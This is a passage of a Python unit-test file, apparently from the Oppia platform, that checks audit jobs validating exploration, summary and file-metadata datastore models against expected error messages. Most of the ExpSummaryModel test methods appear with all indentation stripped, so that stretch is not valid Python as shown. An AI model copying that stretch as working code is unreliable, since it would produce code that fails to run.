        post_commit_status is reported.
        """
        self.model_instance_0.post_commit_status = 'public'
        self.model_instance_0.post_commit_is_private = True
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit is private '
                'check of ExplorationCommitLogEntryModel\', '
                '[u\'Entity id %s: Post commit status is '
                'public but post_commit_is_private is True\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_false_post_commit_is_private(self):
        """Checks that post_commit_is_private=False contradicting a private
        post_commit_status is reported.
        """
        self.model_instance_0.post_commit_status = 'private'
        self.model_instance_0.post_commit_is_private = False
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for post commit is private '
                'check of ExplorationCommitLogEntryModel\', '
                '[u\'Entity id %s: Post commit status is '
                'private but post_commit_is_private is False\']]'
            ) % self.model_instance_0.id,
            u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_invalid_commit_cmd_schmea(self):
        """Checks that commit commands failing domain validation (a missing
        required attribute, or an extra unexpected attribute) are reported
        per command.
        """
        self.model_instance_0.commit_cmds = [{
            'cmd': 'add_state'
        }, {
            'cmd': 'delete_state',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'delete_state check of '
                'ExplorationCommitLogEntryModel\', '
                '[u"Entity id exploration-0-1: Commit command domain '
                'validation for command: {u\'cmd\': u\'delete_state\', '
                'u\'invalid_attribute\': u\'invalid\'} '
                'failed with error: The following required attributes '
                'are missing: state_name, '
                'The following extra attributes are present: '
                'invalid_attribute"]]'
            ), (
                u'[u\'failed validation check for commit cmd '
                'add_state check of '
                'ExplorationCommitLogEntryModel\', '
                '[u"Entity id exploration-0-1: Commit command domain '
                'validation for command: {u\'cmd\': u\'add_state\'} '
                'failed with error: The following required attributes '
                'are missing: state_name"]]'
            ), u'[u\'fully-validated ExplorationCommitLogEntryModel\', 3]']
        run_job_and_check_output(self, expected_output, sort=True)
class ExpSummaryModelValidatorTests(test_utils.GenericTestBase):
    def setUp(self):
        """Creates three explorations with tags, role assignments, a
        contributor edit and two ratings, so the summary models have their
        derived fields populated for the audit.
        """
        super(ExpSummaryModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.owner = user_services.UserActionsInfo(self.owner_id)
        editor_email = 'user@editor.com'
        viewer_email = 'user@viewer.com'
        contributor_email = 'user@contributor.com'
        self.signup(editor_email, 'editor')
        self.signup(viewer_email, 'viewer')
        self.signup(contributor_email, 'contributor')
        self.editor_id = self.get_user_id_from_email(editor_email)
        self.viewer_id = self.get_user_id_from_email(viewer_email)
        self.contributor_id = self.get_user_id_from_email(contributor_email)
        language_codes = ['ar', 'en', 'en']
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            language_code=language_codes[i]
        ) for i in xrange(3)]
        for exp in explorations:
            exp.tags = ['math', 'art']
            exp_services.save_new_exploration(self.owner_id, exp)
        rights_manager.assign_role_for_exploration(
            self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
        # An edit by the contributor makes them show up in the summary's
        # contributor data for exploration '0'.
        exp_services.update_exploration(
            self.contributor_id, '0', [exp_domain.ExplorationChange({
                'cmd': 'edit_exploration_property',
                'property_name': 'title',
                'new_value': 'New title'
            })], 'Changes.')
        rights_manager.assign_role_for_exploration(
            self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
        rating_services.assign_rating_to_exploration(self.user_id, '0', 3)
        rating_services.assign_rating_to_exploration(self.viewer_id, '0', 4)
        self.model_instance_0 = exp_models.ExpSummaryModel.get_by_id('0')
        self.model_instance_1 = exp_models.ExpSummaryModel.get_by_id('1')
        self.model_instance_2 = exp_models.ExpSummaryModel.get_by_id('2')
        self.job_class = (
            prod_validation_jobs_one_off.ExpSummaryModelAuditOneOffJob)
def test_standard_operation(self):
rights_manager.publish_exploration(self.owner, '0')
exp_services.update_exploration(
self.owner_id, '1', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated ExpSummaryModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExpSummaryModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
exp_models.ExplorationModel.get_by_id('1').delete(
self.owner_id, '')
exp_models.ExplorationModel.get_by_id('2').delete(
self.owner_id, '')
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExpSummaryModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_first_published_datetime_than_current_time(self):
rights_manager.publish_exploration(self.owner, '0')
rights_manager.publish_exploration(self.owner, '1')
self.model_instance_0 = exp_models.ExpSummaryModel.get_by_id('0')
self.model_instance_0.first_published_msec = (
self.model_instance_0.first_published_msec * 1000000.0)
self.model_instance_0.put()
rights_model = exp_models.ExplorationRightsModel.get_by_id('0')
rights_model.first_published_msec = (
self.model_instance_0.first_published_msec)
rights_model.commit(self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for first published msec check '
'of ExpSummaryModel\', '
'[u\'Entity id 0: The first_published_msec field has a '
'value %s which is greater than the time when the '
'job was run\']]'
) % (self.model_instance_0.first_published_msec),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 0: based on field exploration_ids having '
'value 0, expect model ExplorationModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_owner_user_model_failure(self):
rights_manager.assign_role_for_exploration(
self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for owner_user_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 0: based on field owner_user_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_editor_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
expected_output = [
(
u'[u\'failed validation check for editor_user_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 0: based on field editor_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.editor_id, self.editor_id),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_viewer_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
expected_output = [
(
u'[u\'failed validation check for viewer_user_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 2: based on field viewer_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.viewer_id, self.viewer_id),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_contributor_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.contributor_id).delete()
expected_output = [
(
u'[u\'failed validation check for contributor_user_ids '
'field check of ExpSummaryModel\', '
'[u"Entity id 0: based on field contributor_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.contributor_id, self.contributor_id),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_exploration_model_last_updated(self):
last_human_update_time = (
self.model_instance_0.exploration_model_last_updated)
self.model_instance_0.exploration_model_last_updated = (
datetime.datetime.utcnow() + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for exploration model last '
'updated check of ExpSummaryModel\', '
'[u\'Entity id %s: The exploration_model_last_updated '
'field: %s does not match the last time a commit was '
'made by a human contributor: %s\']]'
) % (
self.model_instance_0.id,
self.model_instance_0.exploration_model_last_updated,
last_human_update_time),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_schema(self):
self.model_instance_0.ratings = {'10': 4, '5': 15}
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for domain object check of '
'ExpSummaryModel\', '
'[u\'Entity id 0: Entity fails domain validation with '
'the error Expected ratings to have keys: 1, 2, 3, 4, 5, '
'received 10, 5\']]'
), u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_contributors_summary(self):
sorted_contributor_ids = sorted(
self.model_instance_0.contributors_summary.keys())
self.model_instance_0.contributors_summary = {'invalid': 1}
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for contributors summary '
'check of ExpSummaryModel\', '
'[u"Entity id 0: Contributor ids: [u\'%s\', u\'%s\'] '
'do not match the contributor ids obtained using '
'contributors summary: [u\'invalid\']"]]') % (
sorted_contributor_ids[0], sorted_contributor_ids[1]
),
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_exploration_related_property(self):
self.model_instance_0.title = 'invalid'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for title field check of '
'ExpSummaryModel\', '
'[u\'Entity id %s: title field in entity: invalid does not '
'match corresponding exploration title field: New title\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_exploration_rights_related_property(self):
self.model_instance_0.status = 'public'
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for status field check of '
'ExpSummaryModel\', '
'[u\'Entity id %s: status field in entity: public does not '
'match corresponding exploration rights status field: '
'private\']]'
) % self.model_instance_0.id,
u'[u\'fully-validated ExpSummaryModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class FileMetadataModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates FileMetadataModel."""
    def setUp(self):
        """Create 2 explorations and commit one FileMetadataModel each."""
        super(FileMetadataModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            'exp%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(2)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        self.model_instance_0 = file_models.FileMetadataModel.create(
            'exploration/exp0', 'assets/image/img0.png')
        self.model_instance_0.commit(self.owner_id, [])
        self.model_instance_1 = file_models.FileMetadataModel.create(
            'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
        self.model_instance_1.commit(self.owner_id, [])
        self.job_class = (
            prod_validation_jobs_one_off.FileMetadataModelAuditOneOffJob)
    def test_standard_operation(self):
        """Consistent data: both models are reported fully validated."""
        expected_output = [
            u'[u\'fully-validated FileMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on after last_updated fails the time-relation check."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, [])
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of FileMetadataModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance_0.id,
                    self.model_instance_0.created_on,
                    self.model_instance_0.last_updated
                ),
            u'[u\'fully-validated FileMetadataModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the future (via a mocked clock) fails the
        current-time check.
        """
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'FileMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_exploration_model_failure(self):
        """Metadata whose backing exploration is gone fails the
        exploration_ids field check.
        """
        exp_models.ExplorationModel.get_by_id('exp1').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids field '
                'check of FileMetadataModel\', '
                '[u"Entity id %s: based on field exploration_ids having '
                'value exp1, expect model ExplorationModel with id exp1 but it '
                'doesn\'t exist"]]') % self.model_instance_1.id,
            u'[u\'fully-validated FileMetadataModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_snapshot_metadata_model_failure(self):
        """Deleting the version-1 snapshot metadata model fails the
        snapshot_metadata_ids field check.
        """
        file_models.FileMetadataSnapshotMetadataModel.get_by_id(
            '%s-1' % self.model_instance_0.id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of FileMetadataModel\', '
                '[u"Entity id %s: based on field snapshot_metadata_ids '
                'having value %s-1, expect model '
                'FileMetadataSnapshotMetadataModel '
                'with id %s-1 but it doesn\'t exist"]]') % (
                    self.model_instance_0.id, self.model_instance_0.id,
                    self.model_instance_0.id),
            u'[u\'fully-validated FileMetadataModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_snapshot_content_model_failure(self):
        """Deleting the version-1 snapshot content model fails the
        snapshot_content_ids field check.
        """
        file_models.FileMetadataSnapshotContentModel.get_by_id(
            '%s-1' % self.model_instance_0.id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of FileMetadataModel\', '
                '[u"Entity id %s: based on field snapshot_content_ids having '
                'value %s-1, expect model FileMetadataSnapshotContentModel '
                'with id %s-1 but it doesn\'t exist"]]') % (
                    self.model_instance_0.id, self.model_instance_0.id,
                    self.model_instance_0.id),
            u'[u\'fully-validated FileMetadataModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
class FileMetadataSnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    FileMetadataSnapshotMetadataModel.
    """
    def setUp(self):
        """Create 2 explorations and commit a FileMetadataModel for each
        (one by the owner, one by a second user), then look up the
        version-1 snapshot metadata models ('<id>-1').
        """
        super(FileMetadataSnapshotMetadataModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            'exp%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(2)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        file_metadata_model_0 = file_models.FileMetadataModel.create(
            'exploration/exp0', 'assets/image/img0.png')
        file_metadata_model_0.commit(self.owner_id, [])
        file_metadata_model_1 = file_models.FileMetadataModel.create(
            'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
        file_metadata_model_1.commit(self.user_id, [])
        self.id_0 = file_metadata_model_0.id
        self.id_1 = file_metadata_model_1.id
        self.model_instance_0 = (
            file_models.FileMetadataSnapshotMetadataModel.get_by_id(
                '%s-1' % self.id_0))
        self.model_instance_1 = (
            file_models.FileMetadataSnapshotMetadataModel.get_by_id(
                '%s-1' % self.id_1))
        self.job_class = (
            prod_validation_jobs_one_off
            .FileMetadataSnapshotMetadataModelAuditOneOffJob)
    def test_standard_operation(self):
        """Consistent data: both snapshots are reported fully validated."""
        expected_output = [
            u'[u\'fully-validated FileMetadataSnapshotMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on after last_updated fails the time-relation check."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of FileMetadataSnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'FileMetadataSnapshotMetadataModel\', 1]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the future (via a mocked clock) fails the
        current-time check.
        """
        self.model_instance_1.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'FileMetadataSnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_file_metadata_model_failure(self):
        """Snapshots pointing at a deleted FileMetadataModel fail the
        file_metadata_ids field check (deletion itself creates version 2,
        hence two reported entity ids).
        """
        file_models.FileMetadataModel.get_by_id(self.id_0).delete(
            self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for file_metadata_ids '
                'field check of FileMetadataSnapshotMetadataModel\', '
                '[u"Entity id %s-1: based on field file_metadata_ids '
                'having value %s, expect model FileMetadataModel with '
                'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
                'field file_metadata_ids having value %s, expect model '
                'FileMetadataModel with id %s but it doesn\'t exist"]]'
            ) % (
                self.id_0, self.id_0, self.id_0, self.id_0,
                self.id_0, self.id_0
            ),
            u'[u\'fully-validated FileMetadataSnapshotMetadataModel\', 1]']
        run_job_and_check_output(
            self, expected_output, literal_eval=True)
    def test_missing_committer_model_failure(self):
        """Missing UserSettingsModel for the committer fails
        committer_ids.
        """
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of FileMetadataSnapshotMetadataModel\', '
                '[u"Entity id %s-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.id_1, self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'FileMetadataSnapshotMetadataModel\', 1]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_invalid_file_metadata_version_in_model_id(self):
        """A snapshot id claiming version 3 when the parent model is at
        version 1 fails the version check.
        """
        model_with_invalid_version_in_id = (
            file_models.FileMetadataSnapshotMetadataModel(
                id='%s-3' % self.id_0, committer_id=self.owner_id,
                commit_type='edit', commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for file metadata model '
                'version check of FileMetadataSnapshotMetadataModel\', '
                '[u\'Entity id %s-3: FileMetadata model corresponding to '
                'id %s has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ) % (self.id_0, self.id_0), (
                u'[u\'fully-validated FileMetadataSnapshotMetadataModel\', '
                '2]')]
        run_job_and_check_output(self, expected_output, sort=True)
class FileMetadataSnapshotContentModelValidatorTests(
        test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    FileMetadataSnapshotContentModel.
    """
    def setUp(self):
        """Create 2 explorations, commit one FileMetadataModel each, and
        look up the version-1 snapshot content models ('<id>-1').
        """
        super(FileMetadataSnapshotContentModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            'exp%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(2)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        file_metadata_model_0 = file_models.FileMetadataModel.create(
            'exploration/exp0', 'assets/image/img0.png')
        file_metadata_model_0.commit(self.owner_id, [])
        file_metadata_model_1 = file_models.FileMetadataModel.create(
            'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
        file_metadata_model_1.commit(self.owner_id, [])
        self.id_0 = file_metadata_model_0.id
        self.id_1 = file_metadata_model_1.id
        self.model_instance_0 = (
            file_models.FileMetadataSnapshotContentModel.get_by_id(
                '%s-1' % self.id_0))
        self.model_instance_1 = (
            file_models.FileMetadataSnapshotContentModel.get_by_id(
                '%s-1' % self.id_1))
        self.job_class = (
            prod_validation_jobs_one_off
            .FileMetadataSnapshotContentModelAuditOneOffJob)
    def test_standard_operation(self):
        """Consistent data: both snapshots are reported fully validated."""
        expected_output = [
            u'[u\'fully-validated FileMetadataSnapshotContentModel\', 2]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on after last_updated fails the time-relation check."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of FileMetadataSnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'FileMetadataSnapshotContentModel\', 1]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the future (via a mocked clock) fails the
        current-time check.
        """
        self.model_instance_1.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'FileMetadataSnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_file_metadata_model_failure(self):
        """Snapshots pointing at a deleted FileMetadataModel fail the
        file_metadata_ids field check (deletion adds version 2, hence two
        reported entity ids).
        """
        file_models.FileMetadataModel.get_by_id(
            self.id_0).delete(self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for file_metadata_ids '
                'field check of FileMetadataSnapshotContentModel\', '
                '[u"Entity id %s-1: based on field file_metadata_ids '
                'having value %s, expect model FileMetadataModel with '
                'id %s but it doesn\'t exist", u"Entity id %s-2: based on '
                'field file_metadata_ids having value %s, expect model '
                'FileMetadataModel with id %s but it doesn\'t exist"]]'
            ) % (
                self.id_0, self.id_0, self.id_0, self.id_0, self.id_0,
                self.id_0),
            u'[u\'fully-validated FileMetadataSnapshotContentModel\', 1]']
        run_job_and_check_output(self, expected_output, literal_eval=True)
    def test_invalid_file_metadata_version_in_model_id(self):
        """A snapshot id claiming version 3 when the parent model is at
        version 1 fails the version check.
        """
        model_with_invalid_version_in_id = (
            file_models.FileMetadataSnapshotContentModel(
                id='%s-3' % self.id_0))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for file metadata model '
                'version check of FileMetadataSnapshotContentModel\', '
                '[u\'Entity id %s-3: FileMetadata model corresponding to '
                'id %s has a version 1 which is less than '
                'the version 3 in snapshot content model id\']]'
            ) % (self.id_0, self.id_0), (
                u'[u\'fully-validated FileMetadataSnapshotContentModel\', '
                '2]')]
        run_job_and_check_output(self, expected_output, sort=True)
class FileModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates FileModel."""
    def setUp(self):
        """Create 2 explorations and commit one FileModel for each."""
        super(FileModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            'exp%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(2)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        self.model_instance_0 = file_models.FileModel.create(
            'exploration/exp0', 'assets/image/img0.png')
        self.model_instance_0.commit(self.owner_id, [])
        self.model_instance_1 = file_models.FileModel.create(
            'exploration/exp1', '/exploration/exp1/assets/audio/aud1.mp3')
        self.model_instance_1.commit(self.owner_id, [])
        self.job_class = (
            prod_validation_jobs_one_off.FileModelAuditOneOffJob)
    def test_standard_operation(self):
        """Consistent data: both models are reported fully validated."""
        expected_output = [
            u'[u\'fully-validated FileModel\', 2]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on after last_updated fails the time-relation check."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, [])
        expected_output = [
            (
                u'[u\'failed validation check for time field relation check '
                'of FileModel\', '
                '[u\'Entity id %s: The created_on field has a value '
                '%s which is greater than the value '
                '%s of last_updated field\']]') % (
                    self.model_instance_0.id,
                    self.model_instance_0.created_on,
                    self.model_instance_0.last_updated
                ),
            u'[u\'fully-validated FileModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the future (via a mocked clock) fails the
        current-time check.
        """
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'FileModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_exploration_model_failure(self):
        """File whose backing exploration is gone fails the
        exploration_ids field check.
        """
        exp_models.ExplorationModel.get_by_id('exp1').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids field '
                'check of FileModel\', '
                '[u"Entity id %s: based on field exploration_ids having '
                'value exp1, expect model ExplorationModel with id exp1 '
                'but it doesn\'t exist"]]') % self.model_instance_1.id,
            u'[u\'fully-validated FileModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_snapshot_metadata_model_failure(self):
        """Deleting the version-1 snapshot metadata model fails the
        snapshot_metadata_ids field check.
        """
        file_models.FileSnapshotMetadataModel.get_by_id(
            '%s-1' % self.model_instance_0.id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of FileModel\', '
                '[u"Entity id %s: based on field snapshot_metadata_ids '
                'having value %s-1, expect model FileSnapshotMetadataModel '
                'with id %s-1 but it doesn\'t exist"]]') % (
                    self.model_instance_0.id, self.model_instance_0.id,
                    self.model_instance_0.id),
            u'[u\'fully-validated FileModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_snapshot_content_model_failure(self):
        """Deleting the version-1 snapshot content model fails the
        snapshot_content_ids field check.
        """
        file_models.FileSnapshotContentModel.get_by_id(
            '%s-1' % self.model_instance_0.id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of FileModel\', '
                '[u"Entity id %s: based on field snapshot_content_ids having '
                'value %s-1, expect model FileSnapshotContentModel '
                'with id %s-1 but it doesn\'t exist"]]') % (
                    self.model_instance_0.id, self.model_instance_0.id,
                    self.model_instance_0.id),
            u'[u\'fully-validated FileModel\', 1]']
        run_job_and_check_output(self, expected_output, sort=True)
class FileSnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    FileSnapshotMetadataModel.
    """
    def setUp(self):
        """Create 2 explorations and commit a FileModel for each (one by
